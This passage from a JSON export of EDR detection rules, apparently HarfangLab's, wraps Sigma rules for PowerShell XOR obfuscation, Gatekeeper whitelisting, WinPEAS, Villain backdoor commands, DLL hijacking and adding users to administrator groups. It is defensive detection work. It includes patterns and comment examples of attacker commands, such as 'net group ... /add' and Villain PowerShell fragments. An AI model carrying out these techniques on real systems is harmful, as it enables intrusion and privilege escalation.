'AALQBiAFgATwBSACAA'\n - 'gAC0AYgBYAE8AUgAgA'\n - 'IAAtAGIAWABvAHIAIA'\n - 'AALQBiAFgAbwByACAA'\n - 'gAC0AYgBYAG8AcgAgA'\n - 'IAAtAGIAeABPAFIAIA'\n - 'AALQBiAHgATwBSACAA'\n - 'gAC0AYgB4AE8AUgAgA'\n - 'IAAtAGIAeABvAFIAIA'\n - 'AALQBiAHgAbwBSACAA'\n - 'gAC0AYgB4AG8AUgAgA'\n - 'IAAtAGIAeABvAHIAIA'\n - 'AALQBiAHgAbwByACAA'\n - 'gAC0AYgB4AG8AcgAgA'\n - 'IAAtAGIAWABPAHIAIA'\n - 'AALQBiAFgATwByACAA'\n - 'gAC0AYgBYAE8AcgAgA'\n - 'IAAtAEIAWABvAHIAIA'\n - 'AALQBCAFgAbwByACAA'\n - 'gAC0AQgBYAG8AcgAgA'\n - 'IAAtAEIAeABvAHIAIA'\n - 'AALQBCAHgAbwByACAA'\n - 'gAC0AQgB4AG8AcgAgA'\n - 'IAAtAEIAWABPAHIAIA'\n - 'AALQBCAFgATwByACAA'\n - 'gAC0AQgBYAE8AcgAgA'\n\n exclusion_programfiles:\n ParentImage|startswith:\n - '?:\\program files (x86)\\'\n - '?:\\program files\\'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "78e4265f-a2b1-4c20-abe1-dccac19c20b6",
"rule_name": "PowerShell XOR Obfuscation in Command-line",
"rule_description": "Detects the use of XOR encoding in powershell.exe's command-line.\nAttackers can used this technique to obfuscate its command-line to evade defenses.\nIt is recommended to de-obfuscate the command-line, to analyze it and to look for malicious content or actions stemming from the PowerShell process.\n",
"rule_creation_date": "2021-06-24",
"rule_modified_date": "2025-04-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1027",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "78e70aaa-2977-414b-a2be-47a4f46026bb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092962Z",
"creation_date": "2026-03-23T11:45:34.092965Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092972Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper",
"https://support.apple.com/fr-fr/guide/security/sec5599b66df/web",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_add_gatekeeper_whitelist.yml",
"content": "title: Gatekeeper Whitelist Added\nid: 78e70aaa-2977-414b-a2be-47a4f46026bb\ndescription: |\n Detects the execution of spctl to add a whitelist to Apple Gatekeeper.\n Apple Gatekeeper is a mechanism that ensures that software comes from trusted developers, is notarized by Apple as malware-free, and remains unaltered.\n Apple Gatekeeper also requests user approval before opening downloaded software for the first time.\n It is recommended to investigate the process that added the Apple Gatekeeper whitelist and the whitelisted program to determine if this action was legitimate.\nreferences:\n - https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper\n - https://support.apple.com/fr-fr/guide/security/sec5599b66df/web\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/05/03\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.LOLBin.Spctl\n - classification.macOS.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/sbin/spctl'\n CommandLine|contains|all:\n - '--enable'\n - '--tag'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "78e70aaa-2977-414b-a2be-47a4f46026bb",
"rule_name": "Gatekeeper Whitelist Added",
"rule_description": "Detects the execution of spctl to add a whitelist to Apple Gatekeeper.\nApple Gatekeeper is a mechanism that ensures that software comes from trusted developers, is notarized by Apple as malware-free, and remains unaltered.\nApple Gatekeeper also requests user approval before opening downloaded software for the first time.\nIt is recommended to investigate the process that added the Apple Gatekeeper whitelist and the whitelisted program to determine if this action was legitimate.\n",
"rule_creation_date": "2024-05-03",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7904081b-0c28-43d6-9af7-29d3f8704057",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606188Z",
"creation_date": "2026-03-23T11:45:34.606194Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606203Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS",
"https://attack.mitre.org/techniques/T1082/",
"https://attack.mitre.org/techniques/T1592/",
"https://attack.mitre.org/tactics/TA0004/"
],
"name": "t1082_launch_winpeas.yml",
"content": "title: WinPEAS HackTool Executed\nid: 7904081b-0c28-43d6-9af7-29d3f8704057\ndescription: |\n Detects the execution of WinPEAS (Windows Privilege Escalation Awesome Scripts) enumeration tool.\n WinPEAS is a tool used in post-exploitation phases to automatically discover privilege escalation vectors through misconfigurations, vulnerable services, and sensitive credential files.\n Unless this is part of an authorized security assessment, investigate the user context and look for subsequent privilege escalation attempts.\nreferences:\n - https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS\n - https://attack.mitre.org/techniques/T1082/\n - https://attack.mitre.org/techniques/T1592/\n - https://attack.mitre.org/tactics/TA0004/\ndate: 2022/10/19\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1082\n - attack.reconnaissance\n - attack.t1592.001\n - attack.t1592.002\n - attack.t1592.004\n - attack.privilege_escalation\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.WinPEAS\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\WinPEAS*.exe'\n - OriginalFileName: 'WinPEAS*.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7904081b-0c28-43d6-9af7-29d3f8704057",
"rule_name": "WinPEAS HackTool Executed",
"rule_description": "Detects the execution of WinPEAS (Windows Privilege Escalation Awesome Scripts) enumeration tool.\nWinPEAS is a tool used in post-exploitation phases to automatically discover privilege escalation vectors through misconfigurations, vulnerable services, and sensitive credential files.\nUnless this is part of an authorized security assessment, investigate the user context and look for subsequent privilege escalation attempts.\n",
"rule_creation_date": "2022-10-19",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1082",
"attack.t1592.001",
"attack.t1592.002",
"attack.t1592.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "791a287c-44d9-4e49-bc5c-4b5c179c21c1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084578Z",
"creation_date": "2026-03-23T11:45:34.084580Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084584Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/t3l3machus/Villain",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1132/001/"
],
"name": "t1059_001_powershell_villain_backdoor.yml",
"content": "title: Suspicious PowerShell Command linked to Villain\nid: 791a287c-44d9-4e49-bc5c-4b5c179c21c1\ndescription: |\n Detects PowerShell commands executing a Villain framework payload.\n Villain is a Windows & Linux backdoor generator and multi-session handler.\n The framework allows attackers to instantiate shells and control other machines running Villain in the network.\n It is recommended to investigate PowerShell logs, terminate affected processes and isolate compromised hosts.\nreferences:\n - https://github.com/t3l3machus/Villain\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1132/001/\ndate: 2022/12/06\nmodified: 2025/01/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1132.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Villain\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '$env:COMPUTERNAME'\n - '$env:USERNAME'\n - '-Method POST'\n - 'Headers @{Authorization=$*}'\n - 'UTF8.GetBytes($*+$*) -join'\n - '-Ur? $*$*/'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "791a287c-44d9-4e49-bc5c-4b5c179c21c1",
"rule_name": "Suspicious PowerShell Command linked to Villain",
"rule_description": "Detects PowerShell commands executing a Villain framework payload.\nVillain is a Windows & Linux backdoor generator and multi-session handler.\nThe framework allows attackers to instantiate shells and control other machines running Villain in the network.\nIt is recommended to investigate PowerShell logs, terminate affected processes and isolate compromised hosts.\n",
"rule_creation_date": "2022-12-06",
"rule_modified_date": "2025-01-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1132.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "791dc1ad-1617-4926-90cc-51f57089c4ae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605419Z",
"creation_date": "2026-03-23T11:45:34.605422Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605430Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/09cef802316c0db576963b2742b506a9f274f4ae/atomics/T1614.001/T1614.001.md",
"https://attack.mitre.org/techniques/T1614/001/"
],
"name": "t1614_001_system_language_discovery_registry.yml",
"content": "title: System Language Discovered in Registry\nid: 791dc1ad-1617-4926-90cc-51f57089c4ae\ndescription: |\n Detects the identification of system language by querying the registry.\n Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.\n Detects the identification of the system's default language by querying the registry.\n Adversaries may attempt to gather information about a victim's default language to infer the geographical location of that host.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/09cef802316c0db576963b2742b506a9f274f4ae/atomics/T1614.001/T1614.001.md\n - https://attack.mitre.org/techniques/T1614/001/\ndate: 2022/12/23\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1614.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_reg_bin:\n - Image|endswith: '\\reg.exe'\n - OriginalFileName: 'reg.exe'\n\n selection_commandline:\n CommandLine|contains|all:\n - 'query'\n # HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\n - '\\Control\\Nls\\Language'\n\n filter_installlanguage:\n CommandLine|contains: '/v InstallLanguage'\n\n exclusion_programfiles:\n ProcessParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\SysWOW64\\cmd.exe'\n ProcessGrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_launchpad:\n ProcessGrandparentImage|endswith:\n - '\\launchpad.exe'\n - '\\launchpad64.exe'\n ProcessGrandparentProduct: 'IBM Program Launcher'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "791dc1ad-1617-4926-90cc-51f57089c4ae",
"rule_name": "System Language Discovered in Registry",
"rule_description": "Detects the identification of system language by querying the registry.\nAdversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.\nDetects the identification of the system's default language by querying the registry.\nAdversaries may attempt to gather information about a victim's default language to infer the geographical location of that host.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1614.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "797363ca-0ede-4edd-b4bf-67f74a6b356e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619688Z",
"creation_date": "2026-03-23T11:45:34.619690Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619694Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/",
"https://attack.mitre.org/techniques/T1087/001/"
],
"name": "t1033_users_macos.yml",
"content": "title: Users Listed via Users Command\nid: 797363ca-0ede-4edd-b4bf-67f74a6b356e\ndescription: |\n Detects the execution of the users command.\n Attackers may use it during the discovery phase of an attack to retrieve the list of existing users.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\n - https://attack.mitre.org/techniques/T1087/001/\ndate: 2022/11/14\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - attack.t1087.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/users'\n ParentImage|contains: '?'\n\n exclusion_intunes:\n ParentImage: '/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon'\n\n exclusion_interactive_sh:\n ParentImage: '/bin/bash'\n ParentCommandLine: '/bin/sh'\n\n exclusion_ivantie:\n ParentImage: '/usr/local/com.ivanti.cloud.agent/IvantiAgent/Engines/UNO.AUTOMATION.ENGINEMAC64/AutomationEngine'\n\n exclusion_globalprotect:\n ParentImage: '/Applications/GlobalProtect.app/Contents/Resources/PanGpHip'\n\n exclusion_withsecur:\n ParentImage: '/Library/WithSecure/bin/wsswupd.xpc/Contents/MacOS/wsswupd'\n\n exclusion_xpc:\n GrandparentImage: '/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service'\n\n exclusion_intune:\n GrandparentImage: '/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon'\n\n exclusion_pulsesecure:\n GrandparentCommandLine: '/bin/sh /Library/Application Support/Pulse Secure/Pulse/Uninstall.app/Contents/Resources/uninstaller'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "797363ca-0ede-4edd-b4bf-67f74a6b356e",
"rule_name": "Users Listed via Users Command",
"rule_description": "Detects the execution of the users command.\nAttackers may use it during the discovery phase of an attack to retrieve the list of existing users.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "797b2aff-faa6-4227-9ced-54959b8f6c2c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621509Z",
"creation_date": "2026-03-23T11:45:34.621511Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621516Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/",
"https://attack.mitre.org/techniques/T1078",
"https://attack.mitre.org/techniques/T1098"
],
"name": "t1078_net_administrators_add.yml",
"content": "title: User Added to the Administrators Group\nid: 797b2aff-faa6-4227-9ced-54959b8f6c2c\ndescription: |\n Detects the execution of net.exe to add user to the administrators group.\n This is often used by attackers to evade defense and keep persistence via an 'administrators' account.\n It is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\nreferences:\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://attack.mitre.org/techniques/T1078\n - https://attack.mitre.org/techniques/T1098\ndate: 2021/04/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1078\n - attack.t1098\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # net localgroup administrators\n # net group \"domain admins\" /add\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n selection_cmd1:\n CommandLine|contains:\n - ' localgroup '\n - ' group '\n - ' groups '\n selection_cmd2:\n # matches administrators, administrateurs, domain admin, ...\n CommandLine|contains: 'admin'\n selection_cmd3:\n CommandLine|contains:\n - '/add'\n - '\\add'\n\n exclusion_programfiles:\n ProcessAncestors|contains:\n - '\\cmd.exe|?:\\Program Files\\'\n - '\\cmd.exe|?:\\Program Files (x86)\\'\n - '\\powershell.exe|?:\\Program Files\\'\n - '\\powershell.exe|?:\\Program Files (x86)\\'\n - '\\net.exe|?:\\Program Files\\'\n - '\\net.exe|?:\\Program Files (x86)\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '\\cmd.exe|?:\\Windows\\AdminArsenal\\PDQDeployRunner\\'\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\MININT\\Tools\\X64\\TsManager.exe|'\n\n exclusion_openvpn:\n CommandLine|contains: 'OpenVPN Administrators' # C:\\WINDOWS\\system32\\net1 localgroup \"OpenVPN Administrators\" \"user\" /add\n\n exclusion_ipam:\n # powershell.exe -Executionpolicy bypass -file \\\\xxxxSYSVOL\\xxxx\\Policies\\{5b6c301d-0b7a-4680-ae55-73a1da6c7fb0}\\Machine\\Scripts\\Startup\\ipamprovisioning.ps1 DNS IPAMUG@xxxxx S-1-5-21-746137067-436374069-1708511111-22222\n ProcessGrandparentCommandLine|contains|all:\n - 'ipamprovisioning.ps1'\n - 'IPAMUG@'\n # C:\\Windows\\system32\\net1 localgroup Administrateurs /add IPAMUG@xxxxx\n # C:\\Windows\\system32\\net1 localgroup DnsAdmins /add IPAMUG@xxxxxx\n ProcessCommandLine|contains|all:\n - 'net1 localgroup '\n - '/add IPAMUG@'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "797b2aff-faa6-4227-9ced-54959b8f6c2c",
"rule_name": "User Added to the Administrators Group",
"rule_description": "Detects the execution of net.exe to add user to the administrators group.\nThis is often used by attackers to evade defense and keep persistence via an 'administrators' account.\nIt is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2021-04-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1078",
"attack.t1098"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "798ca376-4cbf-466a-8b6f-3522cf77558e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097080Z",
"creation_date": "2026-03-23T11:45:34.097082Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097087Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_change.yml",
"content": "title: DLL Hijacking via change.exe\nid: 798ca376-4cbf-466a-8b6f-3522cf77558e\ndescription: |\n Detects potential Windows DLL Hijacking via change.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'change.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\regapi.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "798ca376-4cbf-466a-8b6f-3522cf77558e",
"rule_name": "DLL Hijacking via change.exe",
"rule_description": "Detects potential Windows DLL Hijacking via change.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "798d887e-cd4b-4b6d-8d33-a6fb2f774b7e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096456Z",
"creation_date": "2026-03-23T11:45:34.096458Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096462Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
